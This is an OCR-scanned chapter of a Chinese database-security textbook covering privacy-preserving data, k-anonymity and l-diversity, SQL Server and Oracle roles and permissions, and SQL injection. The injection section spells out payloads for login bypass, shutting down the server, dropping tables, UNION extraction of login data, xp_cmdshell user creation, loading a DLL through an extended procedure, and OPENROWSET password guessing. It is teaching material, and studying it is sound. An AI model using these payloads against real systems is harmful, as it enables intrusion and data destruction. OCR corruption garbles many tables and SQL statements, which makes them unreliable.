假设 回答 第 一 个 问题 的 概率 是 0(0 取 0. 5) ,回答 第 二 个 问题 的 概率 是 1 一 0。P'(A== 
yes) 表 示 被 调查 者 回答 yes 的 概率 ,P'(A=no) 表 示 被 调查 者 回答 no 的 概率 ,P(A=yes) 表 
示 被 调查 者 中 具有 A 特性 的 概率 ,P(A 二 no) 表 示 被 调查 者 中 不 具有 A 特性 的 概率 ,那么 可 
以 得 到 等 式 ， 

P'(A = yes) = P(A= yes)*0+P(A= no)*(1—0) 
P'(A= no0)= P(A= no)*0+P(A = yes)* (1—0) 

W.L. Du 把 此 技术 扩展 到 需要 处 理 多 个 布尔 属性 上 。 假 设 有 个 布尔 属性 ,E 是 在 这 
n 个 属性 上 的 逻辑 表达 式 , 例 如 E=(Al=1^A2==1^A3==0), 那 么 -了 E=(Al=0^A2= 
0^A3==1), 则 ， 

P'(E) = P(E)x0+P(-E)x(1—0) 
P’'(-E)= P(E)*0+P(E)* (1—0) 

由 于 P'(E) 和 P'( 了 ~“E) 可 以 通过 统计 变换 后 获得 ,那么 通过 数学 运算 就 可 以 解 出 P(E) 
和 P(E)。 

3. 变换 矩阵 方法 

葛 伟 平等 提出 一 种 基于 转移 概率 矩阵 的 方法 来 保护 敏感 数据 , 见 其 他 参考 。 

4. 隐藏 程度 的 量化 

采用 不 同 的 方法 ,其 敏感 数据 的 隐藏 程度 是 不 一 样 的 。 

R. Agrawal 引入 的 评价 方式 是 : 隐藏 程度 反映 了 修改 的 数据 值 与 原始 数据 值 的 接近 程 
度 。 如 果 用 可 信和 度 c% ,表示 数据 z 位 于 [zl,z2] 之 间 的 概率 。 

S. R. M Oliveira 从 不 同 的 角度 引入 多 个 评价 参数 ,主要 包括 敏感 数据 隐藏 失效 数 
(CHF) , 非 受 限 规则 消失 数 (MC)、 人 为 增添 关联 规则 数 (AP) 和 信息 丢失 比率 (D) 。 


9.4.5 数据库 的 隐私 保护 


1. 隐私 数据 
“隐私 ”一 词 源 自 美国 ,是 指 与 他 人 无 关 的 私生活 范围 。 隐 私 权 是 自然 人 享有 的 私人 生 
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活 安 宁 和 私人 信息 依法 受 保护 ,不 被 他 人 非法 侵扰 、 知 悉 、 搜 集 、 利 用 和 公开 的 一 种 人 格 权 ， 
它 包含 主体 一 自然 人 (不 包括 法 人 ) 和 客体 一 隐私 两 部 分 。 隐 私 权 的 宗旨 是 保持 人 的 心情 舒 
畅 .维护 人 格 尊严 。 

信息 时 代 , 隐 私 形式 主要 表现 为 个 人 数据 。 所 谓 个 人 数据 ,是 指 用 来 标识 个 人 基本 情况 
的 一 组 数据 资料 ,包括 身体 的 .生理 的 ,经 济 的 文化 的 ,社会 的 任何 信息 。 主 要 包括 个 人 登 
录 的 身份 .健康 状况 .兴趣 爱好 .个 人 的 信用 和 财产 状况 、 信 用 卡 ` 网 上 账号 和 密码 .邮箱 地 
址 、 网 络 活动 踪迹 等 方面 。 

个 人 隐私 数据 通常 作为 敏感 数据 保存 在 数据 库 中 。 

2. 对 隐私 数据 的 攻击 

利用 查询 或 推理 攻击 个 人 隐私 数据 的 方法 有 : 

(1) 一 致 性 攻击 。 一 致 性 攻击 是 指 等 价 组 内 的 敏感 属性 值 缺 乏 多 样 性 导致 隐私 泄露 。 

(2) 背景 知识 攻击 。 由 于 攻击 者 对 资料 表 所 知道 的 附加 的 背景 知识 引起 的 隐私 泄露 。 

(3) 聚 类 攻击 。 聚 类 是 一 个 将 数据 集 划分 为 若干 组 或 类 的 过 程 , 它 使 得 同一 个 组 内 的 
数据 对 象 具有 较 高 的 相似 度 ,而 不 同 组 中 的 数据 对 象 则 是 不 相似 的 。 相 似 或 不 相似 的 度量 
基于 数据 对 象 描述 属性 的 取 值 如 距离 描述 来 决定 。 

(4) 数据 挖掘 攻击 。 目 前 在 数据 挖掘 领域 有 很 多 推测 的 方法 来 挖掘 用 户 的 隐私 。 例 如 
根据 用 户 偏好 来 推测 用 户 的 隐私 。 

3. 隐私 数据 保护 策略 

Agrawal 等 提出 了 数据 库 隐私 保护 的 10 条 规则 (Ten Principles) , 即 收集 目的 、 提 供 者 
同意 ,收集 限制 .使 用 限制 .泄露 限制 .保留 限制 .准确 .安全 .开放 和 验证 遵从 。 

访问 控制 策略 是 保护 数据 库 隐 私 的 一 个 有 效 且 常用 的 方法 , 它 通 过 限制 用 户 对 数据 库 
对 象 的 各 种 操作 来 保护 敏感 数据 ,数据 库 对 象 包括 表 、 单 元 \ 行 和 列 等 ,操作 包括 查询 删除、 
更 新 和 插入 。 访 问 控制 策略 主要 包括 分 布 数据 、 修 改 数 据 \ 挖 掘 数据 、 隐 藏 保护 的 对 象 和 隐 
藏 保护 技术 等 。 

各 种 方法 都 有 特点 ,对 各 种 隐私 保护 算法 的 几 个 评估 标准 为 性 能 与 开销 、 算 法 精度 ( 丢 
失 比 和 误 生 成 比 ) .隐私 保护 程度 (推出 率 ) 和 通用 程度 。 

4. 隐私 数据 保护 技术 

1) 查询 控制 

查询 是 数据 库 中 最 基本 、 最 常用 和 最 复杂 的 操作 。 通 过 查询 可 以 从 数据 库 中 获得 原始 
的 数据 信息 ,如 某 员工 的 姓名 、 工 号 .家庭 住址 .工资 .工资 总 和 等 。 其 中 有 些 数 据 是 涉及 隐 
私 的 ,如 员工 的 工资 信息 和 家 庭 状况 .公司 的 财务 状况 等 。 有 多 种 策略 可 以 在 查询 过 程 中 保 
护 隐私 。 

(1) 定义 视图 。 为 不 同 的 用 户 定义 不 同 的 视图 ,可 以 限制 各 个 用 户 的 访问 范围 。 例 如 ， 
要 限制 各 系 的 教务 员 只 能 查询 其 本 系 学 生 的 情况 ,可 以 分 别 定 义 只 包含 本 系 学 生 记录 的 视 
图 。 又 如 ,定义 一 个 不 含 工资 属性 的 视图 , 供 查询 职工 一 般 情况 时 用 。 

(2) 访问 控制 。 访 问 控 制 是 对 用 户 访问 数据 库 各 种 资源 (包括 基 表 、 视 图 、 各 种 目录 及 
实用 程序 等 ) 权 力 的 控制 。 不 同 的 用 户 对 数据 库 有 授予 不 同 的 访问 权 。 例 如 ,管理 员 用 户 
ul 和 一 般 用 户 u2, 对 u2 隐藏 查询 员工 的 工资 属性 ,其 授权 的 语句 如 下 : 


GRANT SELECT ON TABIE EMPLOYEE TO Ul; 
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GRANT SELECT (ID, NAME, SEX)ON TABIE EMPLOYEE TO U2; 


(3) 跟踪 审查 。 跟 踪 审查 是 针对 某 些 保密 数据 的 一 种 监视 措施 ,跟踪 记录 有 关 这 些 数 
据 的 访问 过 程 , 一 旦 发 现 潜在 的 窃 密 企图 ,例如 重复 的 \ 相 似 的 查询 ,有 些 DBMS 会 自动 发 
出 警报 ,或 者 根据 这 些 数 据 进行 事后 分 析 和 调查 。 跟 踪 审 查 的 结果 记录 在 一 个 特殊 日 志 
件 上 。 例 如 对 工资 表 SALARY 进行 审计 : 


AUDIT SELECT ON SALARY; 


(4) 统计 安全 。 统 计 查 询 数据 往往 是 可 以 公开 的 ,但 个 别 数据 的 查询 结果 则 是 保密 的 ， 
可 以 限制 查询 的 结果 或 推理 控制 。 例 如 一 个 单位 的 人 均 奖 金 数 可 以 公开 ,而 每 个 人 的 奖金 
数 可 能 需要 保密 。 

(5) VPD 保护 。Oracle 数据 库 提 供 虚 拟 专用 数据 库 (Virtual Private Database,VPD) 
特性 ,即行 级 安全 性 特性 ,并 不 向 用 户 打 开 整 个 表 , 而 是 将 访问 限定 到 表 中 某 个 特定 的 行 , 其 
操作 结果 就 是 每 个 用 户 看 到 完全 不 同 的 授权 数据 集 , 可 以 确保 企业 能 够 构建 安全 的 数据 库 
来 执行 隐私 策略 。 

2) 隐匿 模型 

为 了 保护 个 人 隐私 ,在 数据 发 布 的 时 候 , 一 般 从 数据 表 中 删除 隐私 标识 符 属 性 ,但 是 它 
不 能 抵抗 背景 知识 或 链接 查询 的 一 致 性 攻击 ,依然 有 可 能 造成 隐私 泄漏 。 链 接 查询 攻击 如 
图 9.7 所 示 , 导 致 医疗 信息 表 和 选举 登记 表 的 链接 泄露 。 


Name 


Ethnicity Address 
Visit date Date 
Diagnosis Registered 
Procedure Party 
Medication Affiliation 
Total charge Date last 


Voted 


图 9.7 链接 攻击 导致 信息 泄露 


(1) K- 匿 名 模型 。K- 匿 名 模型 是 防止 链接 查询 攻击 的 方法 。 因 此 要 求 查 询 公布 后 的 数 
据 中 存在 一 定数 量 如 K 个 不 可 区 分 的 个 体 , 即 可 共享 隐私 属性 的 相同 值 至 少 有 K 个 ,使 攻 
击 者 不 能 判别 出 隐私 信息 所 属 的 具体 个 体 , 从 而 防止 了 个 人 隐私 的 泄密 ,如 表 9.9 和 表 9. 10 
所 示 。 


表 9.9 住院 病人 信息 表 


Non-sensitive Sensitive 

Zip code Age Nationality Condition 

1 13 053 28 Russian Heart Disease 
2 13 068 29 American Heart Disease 
3 13 068 21 Japanese Viral Infection 
4 13 053 23 American Viral Infection 
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Non-sensitive 
Zip code Age Nationality 

5 14 853 50 Indian 

6 14 853 55 Russian 

7 14 850 47 American 

8 14 850 49 American 

9 13 053 31 American 

10 13 053 37 Indian 

11 13 068 36 Japanese 

12 13 068 35 American 


表 9.10 满足 4- 匿 名 化 的 住院 病人 信息 表 


Non-Sensitive 
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Zip code Age Nationality 
1 130#* 关 <30 关 
2 ]130 关 关 <30 关 
3 130 关 关 <30 x 
4 130 关 关 <30 x 
5 1485 * >40 关 
6 1485 * >40 关 
7 1485 * >40 x 
8 1485 * >40 x 
) ]130 关 关 六 法 关 
10 130x 关 3 关 关 
11 130# 关 3 关 芝 
过 130x 关 3 关 关 


(2) I- 多 样 性 (IL-Diversity) 匿 名 模型 。 是 将 隐私 属性 取 值 聚 类 为 工种 ,并 采用 模糊 值 
处 理 , 如 表 9.11 中 的 Zip code。 
3) 匿名 化 实现 技术 

(1) 泛 化 和 隐匿 。 泛 化 就 是 将 数据 表 中 隐私 属性 的 具体 值 用 泛 化 值 来 代替 ,使 其 意义 
变 得 更 加 广泛 。 一 般 采 用 泛 化 树 , 如 图 9. 8 所 示 。 

隐匿 就 是 直接 从 数据 表 中 删除 一 些 隐私 属性 值 或 记录 。 隐 匿 通常 和 泛 化 结合 使 用 ,使 
没有 满足 匿名 要 求 的 数据 记录 通过 直接 删除 来 保证 隐私 数据 的 安全 性 。 
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表 9.11 满足 3-Diversity 的 住院 病人 信息 表 


Non-Sensitive Sensitive 
Zip code Age Nationality Condition 
1 1305* <40 关 Heart Disease 
2 1305 * 二 40 关 Viral Infection 
3 1305 关 <40 关 Cancer 
4 1305* <40 关 Cancer 
5 1485 * >40 关 Cancer 
6 1485 ¥ >40 * Heart Disease 
7 1485 * >40 关 Viral Infection 
8 1485 * >40 关 Viral Infection 
9 1306 * <40 * Heart Disease 
10 1306 * <40 Viral Infection 
11 1306 * <40 * Cancer 
12 1306 * <40 * Cancer 
[1, | Country 
[1,3] [6, 10] America Asia 
| | | | 有 p03 
~ A FN IS 
[| USA Canda Brazil Mexico Iran Eygpt India Japan 
和 “是 
(a) 数值 型 资料 泛 化 (b) Country 泛 化 树 
Occuption 


| 


Tech-support Armed-Forces Teacher Doctor Salesman 
(c) Occupation 泛 化 树 
图 9.8 泛 化 树 


(2) 聚 类 。 把 K- 匿 名 问题 看 作 聚 类 问题 ,在 聚 类 时 找到 一 个 聚 类 集 ( 也 就 是 等 价 类 )， 
每 个 聚 类 集中 至 少 包含 K 条 记录 。 为 了 最 大 的 保证 数据 质量 ,需要 在 每 个 聚 类 集中 的 记录 
尽 可 能 相似 ,这 样 可 以 保证 聚 类 集 在 同一 聚 类 中 修改 为 相同 准 标识 符 值 时 ,数据 损失 最 小 。 

(3) 交换 。 基 于 交换 的 匿名 化 技术 则 不 需要 进行 泛 化 ,采用 平移 或 Anatomy 模型 和 
(k，e)-Anonymity 模型 。 
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例如 对 表 9. 12 中 的 性 别 属性 值 (有 限 个 ) 进 行 对 换 变换 ,对 地 址 属性 按 某 种 序号 平移 来 
隐藏 原始 的 私人 属性 数据 ,变换 成 表 9. 13。 


表 9.12 初始 样本 数据 表 


表 9.13 变换 私人 属性 数据 


姓名 性 别 地 址 姓名 性 别 地 址 

张 三 男 清 宝 路 1467 午 张 三 女 宜山 路 100 乔 
李 四 桂林 路 1508 弄 李 四 男 清 宝 路 1467 和 弄 
王 五 宜山 路 100 弄 下 下 男 桂林 路 1508 和 弄 


剖析 Anatomy 方法 ,将 属性 值 分 类 或 组 ,给 出 分 组 ID 表示 ,并 单独 拆 分 成 一 个 独立 表 ， 
不 对 外 查询 。 例 如 表 9. 14 剖析 转换 为 表 9. 15 和 表 9. 16。 
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表 9.14 原始 记录 表 

Age Sex Zip code Disease 
23 M 11 000 Pneumonia 
27 M 13 000 Dyspepesia 
35 M 59 000 Dyspepesia 
59 M 12 000 Pneumonia 
61 F 54 000 Flu 
65 F 25 000 Gastrytis 
65 F 25 000 Flu 
70 F 30 000 Bronchitis 

表 9.15 准 标识 符 表 (QIT) 

Row# Age Sex Zip code Group-ID 
入 23 M 11 000 1 
2 27 M 13 000 1 
3 35 M 59 000 】 
4 59 M 12 000 1 
5 61 至 54 000 2 
6 65 至 25 000 2 
65 至 25 000 2 
8 70 FP 30 000 2 


表 9.16 敏感 属性 表 (ST) 


Group-ID Disease Count 
1 Pneumonia 2 
dyspepesia 2 
2 Flu 1 
罗 Gastrytis 
» bronchitis 1 


(k，e)-Anonymity 匿名 法 ,距离 类 中 心 最 近 的 至 少 k 个 不 同 隐 私 值 的 元 组 聚 为 一 类 ， 
并 要 求 每 个 类 内 敏感 属性 值 最 大 差异 至 少 为 e, 同 时 删除 ID 个 性 化 隐私 属性 如 姓名 ,添加 
分 组 属性 。 如 工资 表 9. 17 采用 (3, 2000)-Anonymity 匿名 法 ,转换 后 如 表 9. 18 所 示 。 


表 9.17 工资 表 
ID Quasi-identifiers Sensitive 
Tuple ID Name Age Zip code Gender Salary 
1 Alex 35 27 101 M 54 000 
2 Bob 38 27 120 M 55 000 
3 Carl 40 27 130 M 56 000 
4 Debra 41 27 229 F 65 000 
5 Elain 45 27 269 F 75 000 
6 Frank 52 27 243 M 70 000 
Gary 36 27 656 M 80 000 
8 Helen 52 27 689 F 75 000 
9 Jason 49 27 635 M 85 000 
表 9.18 满足 (3, 2000)-Anonymity 匿名 的 工资 表 
ID Quasi-identifiers Sensitive 
Tuple ID Group-ID Age Zip code Gender Salary 
1 1 35 27 101 M 54 000 
2 1 38 27 120 M 55 000 
3 il 40 27 130 M 56 000 
4 多 41 27 229 3 65 000 
5 2 45 27 269 F 75 000 
6 2 52 27 243 M 70 000 
1 3 36 27 656 M 80 000 
8 3 52 27 689 F 75 000 
9 3 49 27 635 M 85 000 
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4) 物理 保护 
传统 的 数据 模型 都 以 记录 为 基础 ,构成 文件 存储 在 磁盘 中 。 保 护 隐私 数据 也 要 保护 物 
理 磁盘 ,防止 对 文件 内 容 的 处 理 ,转换 等 操作 。 


9.5 数据 库 应 用 系统 安全 


数据 库 一 旦 得 以 部 署 和 实现 ,必须 向 用 户 提供 各 种 应 用 程序 。 数据库 应 用 系统 的 安全 
也 是 DBA .DA ,应 用 开发 人 员 和 最 终 用 户 的 责任 。 


9.5.1 数据 库 角色 与 权限 


数据 库 通过 对 用 户 标识 来 鉴定 用 户 的 名 字 或 身份 (ID) ,决定 该 用 户 对 系统 的 使 用 权 。 
登录 时 ,系统 一 般 用 口令 表 或 随机 数 挑战 响应 方式 鉴别 用 户 ID ,数据 库 系统 不 允许 一 个 未 
经 授权 的 用 户 对 数据 库 进 行 操作 。 

数据 库 按 职责 将 用 户 分 类 ,相同 类 型 的 用 户 成 为 一 组 ,被 赋予 一 定 的 角色 ,不 同 的 角色 
授予 不 同 的 数据 管理 权限 。 数 据 库 角 色 是 指 为 管理 相同 权限 的 用 户 而 设置 的 用 户 组 ,同一 
角色 下 的 用 户 权限 都 是 相同 的 。 

一 般 将 权限 分 为 三 类 : 数据库 连接 登录 权限 类 、 资 源 管理 权限 类 和 数据 库 管 理 员 权 
限 类 。 

1. SQL Server 的 角色 与 权限 

(1) SQL Server 数据 库 的 角色 。 通 常 可 以 分 为 三 类 : 数据 库 服务 器 角色 数据库 角色 
和 应 用 程序 角色 。 用 户 设置 为 角色 后 就 自动 继承 角色 的 权限 ,未 授权 的 用 户 将 无 法 访问 或 
存 取 数 据 库 数 据 。 

数据 库 服务 器 角色 都 是 SQL Server 内 置 的 , 即 不 能 对 其 进行 添加 、 修 改 和 删除 ,只 能 向 
其 中 加 入 用 户 或 者 其 他 角色 。 数 据 库 角色 是 为 某 一 用 户 或 某 一 组 用 户 授予 不 同 级 别 的 管理 
或 访问 数据 库 以 及 数据 库 对 象 的 权限 ,这 些 权限 是 数据 库 专 有 的 。 应 用 程序 角色 是 一 种 比 
较 特殊 的 角色 ,如 通过 特定 应 用 程序 间接 地 存 取 数据 库 中 的 数据 时 所 使 用 的 角色 。 

SQL Server 利用 系统 存储 过 程 管理 角色 。 管 理 数 据 库 角色 有 6 个 系统 存储 过 程 ,如 
表 9. 19 所 示 。 其 中 sp_addsrvrolemember 和 sp_dropsrvrolemember 只 能 管理 服务 器 角色 。 
只 有 db-owner 的 成 员 才 可 以 添加 任意 成 员 到 数据 库 角色 中 ,角色 所 有 者 只 能 在 其 所 拥有 的 
角色 中 添加 成 员 。 应 用 程序 角色 不 包括 任何 用 户 。 


表 9.19 管理 数据 库 角色 的 存储 过 程 


系统 存储 过 程 功能 描述 
sp_addrole 用 来 创建 一 个 新 的 数据 库 角 色 
sp_droprole 用 于 删除 一 个 数据 库 角 色 
sp_helprole 显示 当前 数据 库 所 有 数据 库 角 色 的 所 有 信息 
sp_addrolemember 向 数据 库 某 一 角色 中 添加 数据 库 用 户 
sp_droprolemember 用 来 删除 某 一 角色 的 用 户 
sp_helprolemember 用 于 显示 某 一 数据 库 角 色 的 所 有 成 员 
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(2) SQL Server 数据 库 的 权限 。 分 为 以 下 三 种 : 

@ 对 象 权 限 。 指 允许 用 户 或 角色 创建 、 修 改 或 删除 数据 库 对 象 , 以 及 允许 备份 和 恢复 
数据 库 和 事务 日 志 。 

@ 语句 权限 。 指 允许 对 数据 库 对 象 (包括 表 、 视 图 ) 进行 查询 .添加 、 修 改 和 删除 操作 ， 
以 及 允许 执行 存储 过 程 。 

@ 暗示 性 权限 。 指 系统 预定 义 的 固定 数据 库 服务 器 角色 成 员 数据 库 拥 有 者 (DBO) 和 
数据 库 对 象 拥有 者 (DBOO) 所 拥有 的 权限 。 

SQL Server 数据 库 权 限 管理 主要 针对 对 象 权限 和 语句 权限 ,通常 权限 有 三 种 状态 : 授 
予 权限 ,撤销 权限 和 拒绝 访问 。 

2. Oracle 的 角色 与 权限 

(1) Oracle 数据 库 角 色 。 

安装 自动 创建 的 一 些 常用 角色 称 为 预定 义 角色 ,包括 高 级 数据 库 管 理 角色 
CONNECT RESOURCE 和 DBA 、 用 于 访问 数据 字典 视图 和 包 的 角色 、 用 于 数据 导入 导出 
的 角色 .用 于 高 级 查询 功能 的 角色 ,用 于 企业 管理 器 和 智能 代理 的 角色 .用 于 创建 拥有 恢复 
库 的 用 户 角色 .DBA 用 于 访问 数据 字典 的 特色 表 的 角色 等 。 

Oracle 建议 用 户 自 己 设计 数据 库 管 理 角色 和 规划 权限 ,而 不 要 简单 使 用 这 些 预 定义 角 
色 。 角 色 所 包含 的 权限 可 以 用 以 下 语句 查询 : 


sql> select * from role sys privs where role=' 角 色 名 '; 


DBA 角色 创建 与 授权 示例 如 下 : 

sql> create role rolel; // 建 一 个 角色 

sql> grant create any table, create procedure to rolel; // 授 权 给 角色 

sql> grant rolel to userl; // 授 予 角色 给 用 户 

Sql> select * from role sys privs; // 查 看 角色 所 包含 的 权限 
sql> create role rolel identified by passwordl; // 创 建 带 有 口令 的 角色 
sql>alter role rolel identified by passwordl; // 修 改 角 色 , 可 带 口令 


Oracle 用 户 a 有 bl、b2 和 b3 三 个 角色 ,如 果 bl 未 生效 , 则 a 不 拥有 bl 所 包含 的 权限 。 
只 有 角色 生效 了 ,角色 内 的 权限 才 作 用 于 用 户 。 


sql> set role role, role2; // 使 当前 用 户 角色 使 rolel、role2 生效 
sql> set role all; // 使 用 该 用 户 的 所 有 角色 生效 ,none 为 所 有 角色 失效 
sql> drop role rolel; // 删 除 当前 用 户 角色 ,相应 的 权限 也 就 没有 了 


(2) Oracle 权限 。 

分 为 系统 权限 和 实体 权限 。 系 统 权限 是 对 用 户 而 言 , 是 系统 规定 用 户 使 用 数据 库 的 权 
限 。 实 体 权限 是 针对 表 或 视图 而 言 的 ,是 某 种 权限 用 户 对 其 他 用 户 的 表 或 视图 的 存 取 权限 。 

系统 权限 分 为 DBA、RESOURCE 和 CONNECT 三 类 。DBA 拥有 全 部 特权 ,是 系统 最 
高 权限 ,只 有 DBA 才 可 以 创建 数据 库 结构 (Create、drop 表 ) ,只 有 管理 员 用 户 才 能 被 授予 该 
权限 。Resource 权限 只 可 以 创建 实体 ,不 可 以 创建 数据 库 结 构 。Connect 权限 只 可 以 登录 
Oracle, 不 可 以 创建 实体 ,不 可 以 创建 数据 库 结 构 。 普 通用 户 可 以 被 授予 connect、resource 
权限 。 
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实体 权限 分 为 select update insert alter index delete 或 all(all 包括 前 面 所 有 记录 权 
、execute( 执 行 存储 过 程 权限 )。 
系统 权限 只 能 由 DBA 用 户 授 出 ,默认 是 sys 和 system 两 个 用 户 。 
普通 用 户 通 过 授权 可 以 具有 与 system 相同 的 用 户 权 限 , 但 永远 不 能 达到 与 sys 用 户 相 
同 的 权限 。system 用 户 的 权限 也 可 以 被 回收 。 
授权 命令 : 


限 


_ 


SQL> grant 权限 to 用 户 名 1 [, 用 户 名 2]… WITH ADMIN|Grant OPTION; 


其 中 ,WITH…OPTION 是 权限 可 传递 ,ADMIN 是 系统 权限 级 联 选项 ,Grant 是 实体 权限 
级 联 选项 。 

回收 命令 : 

SQL> revoke 权限 from 用 户 名 1 [, 用 户 名 2]… 


对 于 实体 权限 将 级 联 回收 。 
查询 dba 用 户 拥 有 权限 : 
SQL> select * from dba role privs; 


SQL> select * from dba sys privs; 


SQL> select * from role sys privs; 


查询 实体 权限 数据 字典 : 
SQL> select owner, table name from all tables; // 用 户 可 以 查询 的 表 
SQL> select table name from user tables; // 用 户 创 建 的 表 


SQL> select grantor, table schema, table name, privilege from all tab privs; 
/1/ 获 得 权限 可 以 存 取 的 表 (被 授权 的 ) 
SQL> select grantee, owner, table name, privilege from user tab privs; 


// 授 出 权限 的 表 ( 授 出 的 权限 ) 


(3) Oracle 用 户 类 型 。 
如 表 9. 20 所 示 。 


表 9.20 ”Oracle 用 户 类 型 


用 户 类 型 功 能 

创建 一 个 新 的 数据 库 
启动 和 关闭 数据 库 

允诺 用 jy 修改 数据 库 运 行 模式 
完成 数据 库 的 备份 与 恢复 
修改 数据 库 的 结构 
创建 用 户 ,权限 管理 等 

数据 库 管理 员 SYSTEM 具有 DBA 角色 的 用 户 . 可 以 执行 数据 库 内 部 的 任意 操作 

其 他 用 户 可 以 进行 数据 库 开发 .创建 任何 实体 ,不 具有 修改 数据 库 结构 的 权限 
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例 : DBA 创建 带 空间 的 用 户 。 


SQL> Create user acc01 identified by acc01 default tablespace account 
temporary tablespace temp profile default quota 50m on account; 


创建 用 户 的 资源 文件 Profile( 类 似 表 , 保 存在 数据 库 中 ) ,再 赋 给 用 户 。 


SQL> create profile student limit //student 为 资源 文件 名 

FAILED LOGIN ATTEMPTS 3 // 指 定 锁定 用 户 的 登录 失败 次 数 

PASSWORD IOCK TIME 5 // 指 定 用 户 被 锁定 天 数 
PASSWORD LIFE TIME 30; // 指 定 口 令 可 用 天 数 


SQL> Alter user acc01 profile student; // 修 改 用 户 Profile 
SQL> grant connect, resource to acc01; // 授 予 用 户 角色 
SQL> drop user 用 户 名 CASCADE; // 将 用 户 及 其 所 建 实体 全 部 删除 


9.5.2 SQL 注入 攻击 


SQL 注入 攻击 是 一 个 严重 而 又 普遍 的 数据 库 安 全 问题 ,是 攻击 数据 库 应 用 系统 的 一 种 
主要 技术 。 它 借助 应 用 程序 通过 参数 化 .动态 SQL 语句 与 数据 库 系 统 进行 交互 的 内 部 罗 
辑 , 利 用 程序 中 存在 的 漏洞 或 Bug 构造 与 应 用 程序 设计 预期 不 同 的 SQL 声明 ,非法 访问 非 
授权 数据 、 算 改 数据 、 破 坏 系 统 。 

1. SQL 注入 攻击 技术 

1) 表单 参数 式 注入 

应 用 程序 表单 输入 为 SQL 查询 提供 参数 ,只 要 在 输入 框 构造 合适 的 SQL 语句 ,就 可 以 
对 数据 库 造 成 攻击 访问 。 

(1) 恒 真 变换 注入 

假设 数据 库 服务 器 运行 一 个 名 称 为 Show. jsp 的 servlet 登录 应 用 程序 , 若 其 账号 判断 
的 SQL 语句 为 : 


SELECT info FROM users WHERE login= 'XXX'AND pass= 'YYY" 


则 在 Web 表单 输入 用 户 和 密码 的 参数 为 "'OR 1=1 一 一 ' 以 及 "" ,执行 的 SQL 语句 为 
SELECT info FROM users WHERE login=' 'OR 1=1 一 一 'AND pass=="。 由 于 1=1 使 
得 WHERE 子 句 为 永 真 ,而 一 一 后 面 的 内 容 被 SQL 解释 器 作为 注释 忽略 ,执行 该 语句 可 以 
登录 且 获 得 info 表 的 全 部 信息 。 

如 果 表 单 输 入 带 破坏 性 的 注入 攻击 参数 ,如 " ';shutdown with nowait; 一 一 "以 及 ""， 
使 WHERE 子 句 变 为 login 二 "; shutdown with nowait; 一 一 'AND pass=" ,将 关闭 数据 库 
服务 器 。 如 "'; drop table users; 一 一 "以 及 "","';Delete From users WHERE "二" 以 及 
""' OR "二 ' "将 删除 users 表 或 其 中 的 全 部 记录 。 

为 了 避免 参数 检查 ,攻击 者 采用 注释 符号 随机 变换 扩展 输入 参数 ,形式 为 


DR/** /OP TAB/** /LE users 


DEAxx /LE/x*¥* /TE FR/x* /OM users 
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(2) 合并 查询 注入 
大 部 分 SQL 注入 攻击 利用 UNION ALL SELECT 从 数据 库 中 摆 取 额外 的 信息 数据 。 
SELECT 语句 的 语法 是 : 


SELECT'… [UNION [ ALL|DISTINCT] SELECT…] 


UNION ALL 选项 将 使 查询 结果 返回 包含 所 有 匹配 的 记录 。 选 择 在 相同 位 置 所 列举 
的 字段 应 该 具有 相同 的 数据 类 型 , 即 攻击 的 字段 个 数 .数据 类 型 需要 匹配 。 构 造 的 UNION 
子 查询 须知 道 目标 表 名 和 字段 名 。 

例如 ,客户 在 输入 地 址 的 表单 注入 参数 "北京 ' UNION ALL SELECT loginame， 
hostname,login_time FROM master. sysprocesses WHERE '1'= "1", 执 行 查询 不 仅 返 回 
合法 的 信息 ,还 返回 数据 库 当 前 登录 信息 ,包括 登录 用 户 名 、 登 录 主 机 和 登录 时 间 。 

攻击 者 还 可 以 利用 sysobjects 或 syscolumns 抽取 用 户 的 对 象 信息 。 注 入 参数 的 字符 
串 为 SELECT name, name. crdate FROM sysobjects WHERE xtype='U', 

实例 中 对 象 sysobjects 是 Microsoft SQL 服务 器 专 有 的 ,也 可 换 成 其 他 类 似 对 象 如 
ORACLE 系统 中 的 V$ SESSION ,Sybase 中 的 MDA。 

(3) 插入 构造 注入 

同样 利用 子 查询 ,在 正常 的 查询 语句 中 构造 INSERT 请 求 子 查询 。 

例如 ,假设 留言 板 关 系 Messages (Subject，Author，Text,Timestamp) ,其 中 属性 对 应 
留言 的 主题 ,登录 名 、 内 容 和 时 间 , 而 时 间 Timestamp 由 系统 自动 生成 。 如 果 攻 击 者 在 主题 
中 输入 'start', 'start', 'start”); INSERT into Messages(Subject, Author) SELECT o. name,c. 
nanme FROM sysobiects o, syscolumns c where c. id= 0. id; INSERT into Messages 
VALUESCend', 在 登录 名 中 输入 end, 在 消息 内 容 中 输入 end, 执 行 留言 将 会 在 留言 板 中 列 
举 所 有 表 的 名 称 , 所 有 字段 的 名 称 。 当 然 , 这 种 攻击 很 容易 暴露 。 

2) 存储 过 程式 SOL 注入 

大 部 分 数据 库 系统 支持 功能 强大 的 存储 过 程 , 可 以 直接 对 数据 库 系统 、 操 作 系统 进行 操 
作 。 因 此 ,存储 过 程式 SQL 注入 攻击 是 非常 严重 的 安全 隐患 。 

例如 ,Microsoft SQL 中 的 exec master. . xp_cmdshell 'dir'\exec master. . xp_ cmdshell ' 
net user add username password ' 人 分 别 用 来 获取 当前 目录 添加 系统 用 户 。 

通过 扩展 存储 过 程 创建 及 使 用 定制 扩展 存储 过 程 是 SQL 注入 攻击 经 常 利用 的 安全 漏 
洞 。 有 很 多 命令 可 以 将 可 能 带 有 恶意 代码 的 DLL 上 传 到 数据 库 服务 器 ,通过 定制 存储 过 程 
启动 激活 。 例 如 sp_addextendedproc 'xp_webserver'\'c:\temp\xp_foo. dll'。 

例如 ,通过 内 建 的 wscript. shell 对 象 ,扩展 存储 过 程 打 开 notepad, 注 入 ';'declare@O 


int exec sp_ oacreate 'wscript. shell ', @ O out exec sp_oamethod @a, 'run', NULL,' 


notepad. exe' 一 一 。 
3) 猜 解 式 注入 攻击 
使 用 OPENROWSET 猜测 管理 员 和 口令 。 语 法 格式 为 : 


SELECT * FROM OPENROWSET ('MSDASQL", 'DRIVER= {SQL Server}; 
SERVER= ;uid= sa;pwd=bar", 'SELECT @ @ version') 
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SELECT * FROM OPENROWSET('SQLOLEDB',";"'sa';'bar','SELECT @@version') 


(1) 猜 表 名 称 。 与 登录 用 户 相 关 的 表 名 大 多 是 admin、adminuser 等 。 输 入 的 参数 可 能 
是 and 0 二 这 (select count(* ) from * ) .and 0<=< 祖 (select count(¥* ) from admin) ,用 来 判 
断 是 否 存 在 admin 这 张 表 。 

(2) 已 知 表 名 猜 记录 数目 。 输 入 的 参数 可 能 是 and 0 和 (select count( * ) from admin) 、 
